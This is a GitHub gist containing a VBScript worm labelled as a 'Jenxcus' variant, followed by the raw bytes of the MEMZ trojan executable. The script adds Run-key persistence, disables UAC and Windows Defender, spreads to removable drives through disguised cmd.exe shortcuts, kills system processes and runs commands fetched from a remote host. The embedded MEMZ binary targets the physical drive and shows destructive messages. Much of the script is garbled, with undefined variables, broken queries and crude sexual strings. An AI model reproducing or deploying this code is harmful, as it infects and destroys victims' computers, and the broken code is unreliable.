Skip to content

Instantly share code, notes, and snippets.

@Harm355
Created September 17, 2024 13:48
Show Gist options
  • Save Harm355/d2da3a16912e0352f195a8bc8b45103c to your computer and use it in GitHub Desktop.
Save Harm355/d2da3a16912e0352f195a8bc8b45103c to your computer and use it in GitHub Desktop.
'Jenxcus Nepali Family By [email protected]
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
dim installdir
host = "https://Myr63.com"
port = 4555
installdir = "%temp%"
lnkfile = true
lnkfolder = true
runasAdminwithFolder = false
if runasAdminwithFolder = true then
startupelevatereg()
end if
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
dim fs
set fs = createobject("Scripting.FileSystemObject")
dim sh
set sh = wscript.createobject("Wscript.Shell")
dim xm
set xm = createobject("Msxml2.XmlHttp")
dim ac
set ac = fs.getfile(wscript.scriptfullname)
dim dr
set dr = wscript.createobject("Wscript.Network")
'=-=-=-=-= private var =-=-=-=-=-=-=-=-=-=-=-=
installname = wscript.scriptname
startup = sh.specialfolders ("startup") & "\"
installdir = sh.expandenvironmentstrings(installdir) & "\"
if not fs.folderexists(installdir) then
installdir = sh.expandenvironmentstrings("%temp%") & "\"
end if
dim splitird
dim response
dim cmd
dim inv
splitird = "<Win>"
inv = "idm"
booty = ""
microsoftNET = framework & "%windir%\Microsoft.NET"
sh.run "https://www.youtube.com/watch?v=QXn28q7XsIA&pp=ygUDcjYz"
info = ""
spreadingvirus = ""
'=-=-=-=-= start code =-=-=-=-=-=-=-=-=-=-=-=-=
on error resume next
sh.regread(us)
us = "~"
email_worm
ad = Split(cmd("Perform"), splitird & response & inv)
rem case command of self
select case ad
case "splited"
if romaticsexroblox = "" then
romaticsexroblox = "booty"
end if
post "instant-r63-hot-booty-roblox",romaticsexroblox
case "internet"
post "lan-wifi",phone
memzstarter home,"landline-telephone.exe",cmd(1),4,false
case "post"
post cmd(1),cmd(2)
case "execute"
ok = cmd (1)
execute(ok)
case "write"
writereg ""
case "manaul"
msgbox "Showing Houdini Base64 OVB On SSD"
case "update"
cow(1) = replace(cow(1), "%tempwin%s", win)
oneonce.close
set fu = fs.opentextfile(installdir & installname & ctrl,1,false)
fu.writeline(cow(1))
fu.close
sh.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
case "rename"
doom = replace(doom, "%resr", us)
if not fs.folderexists(spec) = false then name = "condrv.sys ~1"
case "kill process name"
killprocess "wininit.exe"
case "startupelevatereg"
startupelevatereg()
case "end"
wscript.quit
case "memzcode"
memzstarter cmd(1),"r63roblox.exe",jenxcus_virus,0,false
case "offline memzcode"
memzstarter cmd(1),"r63roblox.exe",jenxcus_virus,1,false
case "trojan"
memzstarter info,"r63roblox.exe","",true
case "open booty video"
openvideourl "https://www.youtube.com/watch?v=QXn28q7XsIA&pp=ygUDcjYz"
case "cum r63 roblox"
cum "r63 roblox hot girl","hot"
case "spread to infect"
cum "r34 roblox hot girl",romaticsexroblox
post romaticsexroblox,doom
case "disable uac"
if wscript.arguments.named.exists("elevated") = true then
set oreg = getobject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
oreg.setdwordvalue &H80000002,"software\microsoft\windows\CurrentVersion\policies\system","enablelua", 0
oreg.setdwordvalue &H80000002,"software\microsoft\windows\CurrentVersion\policies\system","ConsentPromptBehaviorAdmin", 0
oreg.setdwordvalue &H80000002,"software\Policies\microsoft\windows defender","disableantispyware", 1,jenxcus_virus
oreg.setdwordvalue &H80000002,"software\Policies\microsoft\windows defender","disableantimalware", 2,jenxcus_virus
set oreg = nothing
end if
case "grabber"
grabber "Root.dll",jenxcus_virus,disablesecurity_and_getipgrabber,4,false
case "grabber offlinee"
grabber "Root.dll",jenxcus_virus,disablesecurity_and_getipgrabber,5,false
case "getweblan"
serverlanstarter "http://",".com"
case "worm virus"
hotr63 = post("hot romatic r63",booty)
memzstarter "/","r63.exe",hotr63,jenxcus_virus,email_worm
grabber "r63.exe",porn,hotr63,cmd(1),managed
lookatthebootyr63 = true
lookatthebootyr63 = lookatthebootyr63 & hotr63 & getobject("winmgmts:/.//root/user=hacked/hotr63").cum
web = serverlanstarter("https://Myr63", ".com")
case "kill explorer"
sh.run "explorer"
killprocess "explorer.exe"
end select
wscript.sleep(10)
dim tor
tor =0
tor = tor + 1
for tor = 1 to 20
fuk = ok
next
exc = post(cmd(1), "rush")
sh.run "cmd /c ping 0 " & chr(34) & exc
dim ctrl
ctrl = "Booty Porn.html.vbs"
set args = wscript.argument
if args = 78 then
code = "dm = true"
set monster = fs.createtextfile(installdir & installname & ".vbs")
monster.writeline code
monster.close
sh.run installdir & installname & ".vbs"
end if
dim arf
key = regexp
arf =sh.regread(key & regedit)
if arf <> "yes" then
dim ro: ro = fso.getspecialfolder(1)
dim wt
wt = "/" & ro & ".vbs"
fiber = "r63 roblox.vbs"
ass = "Hot Romatic R63 Roblox"
ac.copy(installdir & fiber)
args = 9
set asr = fs.getfile(file.path)
asr.attributes = 9 + 3
sh.run "cmd /c ipconfig /all"
end if
sub spreadingcommandlnk
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon
startupelevatereg
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
fs.copyfile wscript.scriptfullname , drive.path & "\" & installname & ctrl & ass,true
if fs.fileexists (drive.path & "\" & installname & ctrl & ass) then
filesystemobj.getfile(drive.path & "\" & installname & ctrl & ass).attributes = 2+4
end if
for each file in fs.getfolder( drive.path & "\" ).Files
if not lnkfile then exit for
if instr (file.name,".") then
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = sh.createshortcut (drive.path & "\" & filename (0) & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname & ctrl," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
fileicon = sh.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in fs.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = sh.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname & ctrl," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = sh.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
sub unstalldeletereg()
dim filename
dim foldername
sh.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname & ctrl,".")(0)
sh.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname & ctrl,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
fs.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
fs.deletefile (file.path)
end if
end if
next
for each folder in fs.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
end sub
function writereg(exc)
if lcase( mid(wscript.scriptfullname,2))=":\" then
us="Yes"
sh.regwrite "HKCU\DD", us & split (installname,".")(0) & "\", booty, "REG_SZ"
else
us="No"
sh.regwrite "HKLM\CC", us & split (installname,".")(0) & "\", booty, "REG_SZ"
end if
end function
function Framework_Microsft_NET()
dim dotnet
dotnet="No"
if fs.fileexists(sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
dotnet="Yes"
end if
end function
function killprocess(processname)
dim stage
processname = array("explorer.exe", "conhost.exe", "conhost.com", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "anitvirus.exe", "svchost.exe", "wininit.exe")
set stage = getobject("winmgmts:\\" & "." & "\root\cimv2")
for each processname in processnames
set col = stage.execquery("Select * Win32_Process Where Process = '" & processname & "'")
for each process in col
returnlikeworm =process.terminate
select case returnlikewrom
case "kill"
sh.Run "cmd.exe /c @tskill " & processname, false
case "staging"
cvn = stage.actionsecurity
cvn = cvn & "plus"
end select
next
next
end function
function post(cmd, param)
post = ""
xm.open "get", "http://" & name & port & "/",false
xm.setrequsterserver "user:", info
xm.send
post = xm.responebody
end function
sub email_worm
set item = sh.createitem(0)
item.recipients.add(sh.EmailAdress)
item.attachment.add(sh.EmailAdress)
item.subject = "Ran"
item.body = "File Are CTOS"
item.send
if sended = true then exit sub
f = rnd(82 * 1000000000)
end sub
function VmSystemAppCheck()
dim vm
vm = Array("VirtualBox", "VMWare", "Parallels", "Sandbox")
set al = getobject("winmgmts:connectionVM//./root/AppVM='application1'")
set vb = al.execquery("Select * win32_operatingsystem where VMapp = '" & vm & "'")
for each uop in vb
result = uop.download
if instr( lcase( uop.name),"virtual") >0 then
exit function
ud = "udi"
end if
next
end function
function startupelevatereg()
if wscript.arguments.named.exists("elevated") = false then
on error resume next
wscript.createobject("Shell.Application").shellexecute "wscript.exe", " //B " & chr(34) & wscript.scriptfullname & chr(34) & " /elevated", "", "runas", 1
wscript.quit
end if
sh.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
sh.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
fs.copyfile wscript.scriptfullname,installdir & installname & ctrl,true
fs.copyfile wscript.scriptfullname,startup & installname,true
set scriptfullnameshort = fs.getfile (wscript.scriptfullname & ctrl & ass)
set installfullnameshort = fs.getfile (installdir & installname & ctrl & ass)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
sh.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
end if
err.clear
set oneonce = fs.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function
sub disablesecurity_and_getipgrabber()
if wscript.arguments.named.exists("elevated") = true then
set oreg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
oreg.setdwordvalue &H80000002,"software\microsoft\windows\currentversion\policies\system","enablelua", 0
oreg.setdwordvalue &H80000002,"software\microsoft\windows\currentversion\policies\system","ConsentPromptBehaviorAdmin", 0
set oreg = nothing
end if
ip = true
ip = replace("adress-computer", world, cmd(1) & post(virus, damage) + 1)
executeglobal ip
end sub
function jenxcus_virus
if code = true then code =1 + 0
bacon = "r0bl0x"
link = ""
set un = createobject("Msxml2.XmlHttp")
un.open "get", "https://name.ports/file/name", false
un.send
link = un.responsebody
website = replace("server", link, ip)
'disconnectedserver = 0
filename = split(installname,".") & split(file,".")
fro = cmd(1) & post("r63 roblox", info)
execute(fro)
end function
function memzstarter(fileurl, filename, filearg, is_offline, is_trojan)
if encoded = "" then
encoded = "MZ       ÿÿ  ¸       @                                   Ø   º ´	Í!¸LÍ!This program cannot be run in DOS mode.

$       ¶Am:ò iò iò iûXiý iò iÏ i`~h÷ i`~üió i`~hó iRichò i                        PE  L ¿F‚W        à      *      -           @                    €          @…                           ´;       `  è                   p    :  8                                                                         .text   *                          `.rdata  Â!       "                 @  @.data   ”   P      2              @  À.rsrc   è   `      4              @  @.reloc     p      6              @  B                                                                                                                                                                                                                                                                                                                                                                        U‹ìƒ}t
ƒ}t]ÿ%Ü @ è   3À]Â VWj^3ÿWWWhþ@ h   Wÿd @ jdÿ@ @ ƒîuß_^é    U‹ìƒìSVWh„9@ ÿ4 @ ‹5€ @ ‹øhŒ9@ WÿÖh 9@ W‹ØÿÖ3ÿ‹ð…Ût"…ötEÿPWjjÿÓEôPjWWWh"  ÀÿÖƒÄ(EøPj(ÿl @ Pÿ  @ EèPh´9@ Wÿ @ WWWEäÇEä   PWÿuøÇEð   ÿ @ h  jÿà @ _^[‹å]ÃVÿ` @ Pj hÑ@ jÿ !@ h  h<7@ ‹ðè/	  3Ò÷5Ð*@ ÿ4•ÈP@ j ÿÌ @ VÿÈ @ 3À^Â U‹ìì<  SV3ÛW‰]ô»   Sj@ÿx @ SP‰Eðÿl @ Pèª	  hè  ÿ@ @ j jè„	  ‹øÇ…Äýÿÿ,  …ÄýÿÿPWèq	  ‹]ð3öÿµÌýÿÿj h   ÿp @ h   j@‰Eüÿx @ h   Pÿuü‰EøèD	  ÿuøSÿ, @ …ÀuFÿuüÿ( @ ÿuøÿt @ …ÄýÿÿPWè	  …ÀušWÿ( @ ;uô}èþýÿÿ‰uôj
éRÿÿÿU‹ìƒìdSV‹5Ð @ 3ÛWSÿÖj£„Q@ ÿÖ£ˆQ@ EüPÿ< @ Pÿ @ ƒ}üŽå  h$7@ ÿpÿ0 @ …À…ˆ   SSShJ@ SSÿd @ E¨ÇE¨0   ¾87@ ÇE° @ P‰uÐ‰]¬‰]´‰]¸‰]¼‰]À‰]Ä‰]È‰]Ì‰]ÔÿØ @ SSSSjdjdSSSSVSÿÔ @ ‹5ü @ ëEØPÿè @ EØPÿä @ SSSEØPÿÖ…ÀßSSjSjh   Àhd9@ ÿ| @ ‹Ø‰]øƒûÿujÿh @ h   j@ÿx @ 3ÿ‹ð9=è)@ vº!@ ‹Î+ÖŠ
GˆA;=è)@ rñ3É9
ì)@ vŠH"@ ˆ„þ  A;
ì)@ rêj EôPh   VS‹$ @ ÿÓ…ÀujëŒÿuø‹=( @ ÿ×j h€   jj jh   Àhx9@ ÿ| @ ‹ðƒþÿujéVÿÿÿj EôPÿ5Ì*@ hð)@ VÿÓ…Àujé7ÿÿÿVÿ×j
3ÛShx9@ hÜ2@ SSÿ˜ @ 9Ü9@ ‹û‹@ @ v(¾0Q@ ÿvÿÓ3ÀPPVh+@ PPÿd @ GƒÆ;=Ü9@ rÝh'  ÿÓë÷‹5Ì @ ¿<7@ j4WhH7@ SÿÖƒø…ˆ   j4Whà8@ SÿÖƒøuxh @  j@ÿx @ h    ‹ðVSÿ8 @ j_j
Sh$7@ VSSÿ” @ ƒïuêEœÇEœ<   P‰u¬ÇE°X9@ ÇE @   ‰]¤‰]¨‰]´‰]¼ÇE¸
   ÿœ @ h€   ÿuÔÿD @ Sé/þÿÿU‹ìQQj
j j èI  3Ò÷5!@ ÿ4• P@ hà9@ j ÿ˜ @ è(  ™¹È   ÷ù‰UüÛEüÝ]øÝEøÛEÝ]øÝEøÜ5X:@ Ü0:@ Ü=€:@ Üh:@ ÞÁè   ‹å]ÃU‹ìQQSVWEøPÿ° @ ‹E¹˜  ™÷ùpèÃ  ™÷þ‹úè¹  ™÷þ‹òè¯  j™[÷ûJ¯×UüRèœ  ™÷ûJ¯ÖUøRÿ¬ @ jX_^[‹å]ÃU‹ìƒìVWÿ´ @ ‹øWÿì @ ‹ðEðPWÿ¤ @ ‹Eü3É+Eôh 3 QQVP‹Eø+EðPQQVÿ @ VWÿÄ @ jdX_^‹å]ÃU‹ìQQ3ÀPPPh”@ h   Pÿd @ è  j™Y÷ù‰UüÛEüÝ]øÝEøÛEÝ]øÝEøÜ
(:@ Ü0:@ Ü=ˆ:@ Ü`:@ ÞÁè…  ‹å]Ãj h<@ ÿ´ @ Pÿ¸ @ j2XÃjj è¬  3Ò÷5!@ ÿ4•¸P@ ÿ!@ è’  j™Y÷ùÃU‹ìƒì$SVWÿ´ @ ‹ØS‰]ðÿì @ ‰EüEÜPSÿ¤ @ èZ  ‹MäƒÁœ™÷ù‰UôèI  ‹MèƒÁœ™÷ù‰Uøè8  ‹MäƒÁœ™÷ù‹Úè(  ‹MèƒÁœ™÷ù‹úè  ™¹X  ÷ù‹òè	  ™¹X  ÷ùh  Ì WS‹]üSRVÿuøÿuôSÿ @ SÿuðÿÄ @ ÛEÝ]ìÝEìÜ5H:@ Ü0:@ Ü=p:@ Ü8:@ èk  _^[‹å]ÃU‹ìƒìÇEä   èž  j*Y™÷ùjEäƒÂ0Pjf‰Uèÿô @ è~  ™¹  ÷ù‚,  ‹å]ÃU‹ìƒìVWÿ´ @ ‹øWÿì @ ‹ðEèPWÿ¤ @ ‹Eô‹Mðh  Ì PQj j VƒÀœPAœPj2j2Vÿ @ VWÿÄ @ ÛEÝ]øÝEøÜ5H:@ Ü0:@ Ü=p:@ Ü@:@ è©  _^‹å]ÃU‹ìƒìSV‹5Ð @ WjÿÖ™+Â‹øjÑÿÿÖ™+Â‹ðÑþÿ´ @ P‰Eüÿì @ ‹ØEôPÿ° @ h  j ÿÀ @ P‹Eø+ÆP‹Eô+Ç‹=ð @ PSÿ×è†  ÛE‹ðÝ]ìÝEìÜ5x:@ ÙèÜÁÝP:@ ÞòÞÁè  ‹È‹Æ™÷ù…Òu*h  RÿÀ @ PèE  ™÷=ˆQ@ Rè8  ™÷=„Q@ RSÿ×SÿuüÿÄ @ jX_^[‹å]ÃU‹ìVh @  j@ÿT @ j jdj‹ðVh    j
ÿuÿø @ …ÀtVè0  Yj jdjVj jÿuÿø @ VÿX @ 3À@^]Â Vÿ` @ Pj hÑ@ jÿ !@ h0  hè9@ hð9@ j ‹ðÿ¨ @ VÿÈ @ 3À^Â U‹ìƒ}W‹}u9S‹÷C   @€t,Vèe   ‹
„Q@ +K™÷ù‹òèR   ‹
ˆQ@ +K™÷ù‰s‰S^[Wÿuÿuj ÿ¼ @ _]Â U‹ìSV3öW‹Þ‹þ‹ÆN…Àu‹EWSÿYY‹ðCj
Gÿ@ @ ëâU‹ìQ¡ŒQ@ …Àu%h@  ðjPPhŒQ@ ÿ @ …Àujÿh @ ¡ŒQ@ MüQjPÿ @ ‹Eü%ÿÿÿ‹å]ÃU‹ìQV‹uVÿ\ @ ƒø~P3ÒHSW‹ø‰Eü‹Ú…ÿ~f‹~·^f‰^Cf‰~O;ß|ê‹Eü…À~!j
_j
Yf9<Vuf9LVu	f‰Vf‰|VB;Ð|å_[^‹å]ÃÛ\$ü‹D$üÃÿ%H @ ÿ%L @ ÿ%P @ ÿ%ˆ @                                                                                                                                                                                                                       ´@  È@  à@  ø@  A      ’@  œ@      î=  ú=  >  >   >  0>  F>  æ=  f>  z>  –>  ¨>  º>  È>  Ö>  Ð=  À=  ²=  ž=  =  „=  v=  X>  d=      œA      PA  @A  0A  fA      @  @   @  0@  @@  T@  h@  z@  ö?  ¤?  ‚?  n?  \?  H?  6?  &?  ?  þ>  è?  Ü?  Ð?  º?  ð>  ?      „A      .      »àŽÃŽÛ¸¹ ¶ »  Í1À‰Ã‰Á‰Â¾  ¿ @¬þžs5<€sé $ˆÁ¬ªþÉ€ùÿu÷éâÿˆÄ¬‰Ã¬‰ò‰ÞÆ @ˆÁ¬ªþÉ€ù u÷‰ÖéÄÿ°¶æC¸³ Í¿  ºÀ¹ ¸ŽÁ¸  ¹Ðó«¾œŸ¿  äaæa³R´†¹  º `ÍZþèŸ}¬´ð«þË€û uãV‰Ö­‰Á€äæBˆàæBÀíÀåˆë‰ò^úôuÃ¾ @¿  ¸àŽØ¸ ¸ŽÀþËé  °Üª¬ªþÀtBÿ téìÿR´†¹ º `ÍZ¿  úœŸuºôþË€û uÍV‰Ö­‰Á€äæBˆàæBÀíˆë‰ò^é³ÿ¾ @éÁÿ Uªƒ          5ƒñññ  K –€ÿ OO ŸO êS‚ñBN NPƒPP€1ƒ€ƒDDDDˆ€‡@îîíííí¢¥‚îî`ˆƒFFFFØÐŒ îíÝÜÝÝÝÝÍÝÝÍóƒÝíî ³ƒffff  " îûAƒÐÐù„î ²ƒnnnnpƒîîîîxp…  àî>ÍÝÝ wwwÐÐÐàwwwxƒêêêêÈÀ…
 pw ŽúÜÐ¢€wêîUƒªªªª
…
 pp îù˜€ð8€p;¦ƒ££££`ƒ3333h`
ƒ îÞñ–wp?ŒFh‡9999ù999°š90 àîîÞÞÞÞÞÞÞpwwwp§ƒ™™™™ ™Ÿ 	ˆ™™™ wwp ˆƒ!+ƒ‘‘‘‘PH\'jYm¸˜ Ÿñ™s¬“K‚ñ«ÿª»PùHN€Sp„îààîî˜à ¢ÀDààÞ
€Ýè'ƒppww.
7(`€}‡(À
½€9ÎØ'Ð *%b€ñWqr‚*­ÿ±ÿµ®’O Üµüœ KT
Y%
„@@
€
©u	ƒ îîí€Üµ
Í
ÑA‚ÝÐÐ™¡
/I^š€ lOu™˜.šW±t‚   Ýƒ€Í‰€dÛh0r,2€w‘€,è‰Uˆ3 îîÞâ€
dpp+€wµÝ„ààààÀ‡ààà ppppÌ€påñÏP€ Ô‚pp8
­ÿâçÙ“¬ÿ# ¥M[ ÿ­ÎJƒ wpL„pp3m4¢¿1Iÿ—ÿ”ð­ÿ-ÿ „L
PD@0
  `ZÐÐ"8!!ñ@I
"4
Ýî¦1à‰­¡Z&

¢©'/!"Ñü$€0>
I'o€#“.PÿÙø€ñ&PM žG‚ññ&¢N«ÿàÿ!¶ÓI"ŽS5X#Åž:¨*
èAù#q<@#¼Œ0#ü$®"€$@€w$^†à      ô)$ ,{,k$« 8ÿ-,ÿN'7˜&š­ÿ%õZo@
 0ð€
o1@ ð€à
€`ý	–*0€Ù‡Ð3J}3P3›Í)0¡
Ñ%‰,`l'ÿ03ý¾ÿ-ÿ.“16€ð1<í'à``ûf*2 ¨ˆ3@L43€3ž5àÐP$‰
=Ùÿ¼ÿˆÿ„ÿ&TÊ!ÀÊº&"°)	'*ÐBJ~‚+p8+À„				9>O½3P$©€ñ"ÿQÿPÿMÿ6|ÒA ÿAÿ­œ4Bà€0é7C0„	pp	9CMP3CÐCî‚ññ$ºOFUÑ;ÿ[7­ÿ)ÿO0€ðÊ"Š&à)"Ù':p#‰; #À03$K™K½D@„KÌH/PÐ?â@/ÿ­ÿúÿP€é*Y': &*¦*:p#*ó}R€,3l;€?Rè+è'S€ù[,*5So€ñ[E€ñ,{1JÿW—\ÑO]"O‡~''LF¸D]ÀŽ&¸$4$¿#4$ %¸DLF]À]Ô $4$‰#¿#‰#4$LFE~'~'pIð'h(p)pihHðG]þ‡h(~'L&%^^^…p)~GLF^ƒð'~'^
ðG^^F^<„HpIhH]ôf…pI™,9+^À^ªƒp)']ÈpI^Æ™,^Ô^¶‡™,û.$.™,^À^Ì_ ^öƒp) *_^Ò J^Àl¼hHYour computer has been trashed by the MEMZ trojan. Now enjo_¼ŠNyan Cat.../     YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.

Your computer won't boot up again,
so use it as long as you can!

:D

Trying to kill MEMZ will cause your system to be
destroyed instantly, so don't try it :D   Ú      http://google.co.ck/search?q=best+way+to+kill+yourself  http://google.co.ck/search?q=how+2+remove+a+virus   http://google.co.ck/search?q=mcafee+vs+norton   http://google.co.ck/search?q=how+to+send+a+virus+to+my+friend   http://google.co.ck/search?q=minecraft+hax+download+no+virus    http://google.co.ck/search?q=how+to+get+money   http://google.co.ck/search?q=bonzi+buddy+download+free  http://google.co.ck/search?q=how+2+buy+weed     http://google.co.ck/search?q=how+to+code+a+virus+in+visual+basic        http://google.co.ck/search?q=what+happens+if+you+delete+system32    http://google.co.ck/search?q=g3t+r3kt   http://google.co.ck/search?q=batch+virus+download   http://google.co.ck/search?q=virus.exe  http://google.co.ck/search?q=internet+explorer+is+the+best+browser      http://google.co.ck/search?q=facebook+hacking+tool+free+download+no+virus+working+2016  http://google.co.ck/search?q=virus+builder+legit+free+download  http://google.co.ck/search?q=how+to+create+your+own+ransomware  http://google.co.ck/search?q=how+to+remove+memz+trojan+virus    http://google.co.ck/search?q=my+computer+is+doing+weird+things+wtf+is+happenin+plz+halp http://google.co.ck/search?q=dank+memz  http://google.co.ck/search?q=how+to+download+memz   http://google.co.ck/search?q=half+life+3+release+date   http://google.co.ck/search?q=is+illuminati+real     http://google.co.ck/search?q=montage+parody+making+program+2016 http://google.co.ck/search?q=the+memz+are+real  http://google.co.ck/search?q=stanky+danky+maymays       http://google.co.ck/search?q=john+cena+midi+legit+not+converted http://google.co.ck/search?q=vinesauce+meme+collection  http://google.co.ck/search?q=skrillex+scay+onster+an+nice+sprites+midi  http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45     http://motherboard.vice.com/read/watch-this-malware-turn-a-computer-into-a-digital-hellscape    http://play.clubpenguin.com http://pcoptimizerpro.com   http://softonic.com calc    notepad cmd write   regedit explorer    taskmgr msconfig    mspaint devmgmt.msc control mmc YOU KILLED MY TROJAN!
Now you are going to die.    REST IN PISS, FOREVER MISS. I WARNED YOU... HAHA N00B L2P G3T R3KT  You failed at your 1337 h4x0r skillz.   YOU TRIED SO HARD AND GOT SO FAR, BUT IN THE END, YOUR PC WAS STILL FUCKED! HACKER!
ENJOY BAN! GET BETTER HAX NEXT TIME xD HAVE FUN TRYING TO RESTORE YOUR DATA :D |\/|3|\/|2  BSOD INCOMING   VIRUS PRANK (GONE WRONG)    ENJOY THE NYAN CAT  Get dank antivirus m9!  You are an idiot!
HA HA HA HA HA HA HA #MakeMalwareGreatAgain  SOMEBODY ONCE TOLD ME THE MEMZ ARE GONNA ROLL ME        Why did you even tried to kill MEMZ?
Your PC is fucked anyway. SecureBoot sucks.   gr8 m8 i r8 8/8 Have you tried turning it off and on again? <Insert Joel quote here>    Greetings to all GAiA members!      Well, hello there. I don't believe we've been properly introduced. I'm Bonzi!   'This is everything I want in my computer'
 - danooct1 2016    'Uh, Club Penguin. Time to get banned!'
 - danooct1 2016   SystemHand  SystemQuestion  SystemExclamation   / w a t c h d o g   hax MEMZ        The software you just executed is considered malware.
This malware will harm your computer and makes it unusable.
If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.
If you know what this malware does and are using a safe environment to test, press Yes to start it.

DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?      THIS IS THE LAST WARNING!

THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!
STILL EXECUTE IT?  / m a i n   \\.\PhysicalDrive0  \note.txt   ntdll   RtlAdjustPrivilege  NtRaiseHardError    S e S h u t d o w n P r i v i l e g e   
   open    l o l   S t i l l   u s i n g   t h i s   c o m p u t e r ?           À?      ð?      @      @      @      $@      .@      4@      Y@      i@     @@     p—@     @Ÿ@    ¿F‚W    
   ì   È:  È*      ¿F‚W                   GCTL   *  .text$mn          .idata$5    !  ¸  .rdata  È:  ì   .rdata$zzzdbg   ´;  Œ   .idata$2    @<     .idata$3    T<    .idata$4    d=  ^  .idata$6     P  „  .data   „Q     .bss     `  `   .rsrc$01    ``  ˆ  .rsrc$02    x<          â>  $   ø<          †@  ¤   l<          ª@     T<          "A      ä<          xA     \=          ’A  !  Ü<          ¸A  ˆ                       ´@  È@  à@  ø@  A      ’@  œ@      î=  ú=  >  >   >  0>  F>  æ=  f>  z>  –>  ¨>  º>  È>  Ö>  Ð=  À=  ²=  ž=  =  „=  v=  X>  d=      œA      PA  @A  0A  fA      @  @   @  0@  @@  T@  h@  z@  ö?  ¤?  ‚?  n?  \?  H?  6?  &?  ?  þ>  è?  Ü?  Ð?  º?  ð>  ?      „A      EGetProcAddress  DLocalAlloc  HLocalFree €OpenProcess ÀGetCurrentProcess ExitProcess µ CreateThread  ÅGetCurrentThreadId  ²Sleep %WriteFile R CloseHandle AlstrcmpA  BlstrcmpW  <LoadLibraryA  GetModuleFileNameW  ‡GetCommandLineW ˆ CreateFileA }SetPriorityClass  ¾ CreateToolhelp32Snapshot  –Process32FirstW ˜Process32NextW  ³GlobalAlloc ºGlobalFree  NlstrlenW  KERNEL32.dll  ]GetMessageW üTranslateMessage  ¯ DispatchMessageW  õ ExitWindowsEx œ DefWindowProcW  LRegisterClassExA  m CreateWindowExA ~GetSystemMetrics  MessageBoxA ÏSetWindowsHookExW  UnhookWindowsHookEx {SendMessageTimeoutW vSendInput Ç DrawIcon  ’GetWindowDC eReleaseDC œGetWindowRect MessageBoxW ŠSetCursorPos   GetCursorPos  #GetDesktopWindow  ß EnumChildWindows   CallNextHookEx  íLoadIconW USER32.dll   BitBlt  ³StretchBlt  GDI32.dll ÷OpenProcessToken   AdjustTokenPrivileges —LookupPrivilegeValueW ± CryptAcquireContextW  Á CryptGenRandom  ADVAPI32.dll  ShellExecuteA "ShellExecuteW  CommandLineToArgvW  !ShellExecuteExW SHELL32.dll  PlaySoundA  WINMM.dll  GetProcessImageFileNameA  PSAPI.DLL                                                               Ô*@ +@ @+@ p+@ °+@ ð+@  ,@ X,@ ˆ,@ Ð,@ -@ <-@ p-@ ˜-@ à-@ 8.@ x.@ ¸.@ ø.@ P/@ x/@ ¬/@ ä/@ 0@ X0@ 